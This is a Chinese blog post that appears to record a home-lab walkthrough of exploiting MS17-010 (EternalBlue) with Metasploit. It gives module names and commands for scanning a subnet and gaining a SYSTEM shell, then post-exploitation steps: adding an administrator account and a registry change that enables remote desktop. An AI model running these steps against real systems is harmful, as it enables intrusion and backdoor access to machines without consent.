还记得之前的一个php小脚本吗?用来探测192.168.X.X网段的网关。当探测到网关的时候,我们可以进一步探测该网关所在的网段存在的主机和漏洞的发现
实验环境:局域网,metasploit
漏洞利用:ms-17-010
使用kali打开metasploi0t,实验一下这个曾经轰动一时的漏洞
搜索cve-2017-0146或者ms17_010
![](https://img.haomeiwen.com/i1734768/3bedbae14acbc4c5.png)
auxiliary/scanner/smb/smb_ms17_010 //扫描某个网段是否存在ms17_010漏洞
exploit/windows/smb/ms17_010_eternalblue //永恒之蓝Eternalblue漏洞利用模块
exploit/windows/smb/ms17_010_psexec //永恒协作EternalSynergy、永恒浪漫EternalRomance、EternalChampion永恒冠军 继承在一起的模块
选择漏洞辅助模块进行探测
![](https://img.haomeiwen.com/i1734768/5865cdac7645648c.png)
use auxiliary/scanner/smb/smb_ms17_010 //使用漏洞扫描辅助模块
set rhosts 192.168.121.1/24 //设置121这个网段
set threads 100 //设置线程为100
run
发现有可能利用的漏洞机器192.168.121.61
使用攻击模块进行确定
![](https://img.haomeiwen.com/i1734768/c53f6e25f6e10f22.png)
![](https://img.haomeiwen.com/i1734768/cfb8d494df9fc876.png)
use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010利用攻击模块
set rhost 192.168.121.61 //设置靶机IP地址
run //利用
![](https://img.haomeiwen.com/i1734768/6729bb1d2cf952ef.png)
竟然直接进入cmd窗口,而且还是system权限
简单执行几个DOS命令
![](https://img.haomeiwen.com/i1734768/b40c9b043eeb6b02.png)
![](https://img.haomeiwen.com/i1734768/f0137cd917546358.png)
![](https://img.haomeiwen.com/i1734768/5cf8d26e9856c2c2.png)
![](https://img.haomeiwen.com/i1734768/fc6b4b00c833c84e.png)
![](https://img.haomeiwen.com/i1734768/fc82c8df7a88bec2.png)
systeminfo //查看主机的系统信息
net user 123 123 /add //添加用户
net localgroup administrators 123 /add //添加123用户到管理员
netstat -an //查看主机端口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f //DOS命令开启3389端口
可以直接进行连接
![](https://img.haomeiwen.com/i1734768/dd59746eb381dafe.png)
还可以使用exploit/windows/smb/ms17_010_psexec利用模块
再次进行一些设置,和上面同理,话不多说,直接上最后效果图
![](https://img.haomeiwen.com/i1734768/1d5d753f74b38798.png)
![](https://img.haomeiwen.com/i1734768/facd0dc2e4ffe0fc.png)
更多meterpreter命令,参考资料
网友评论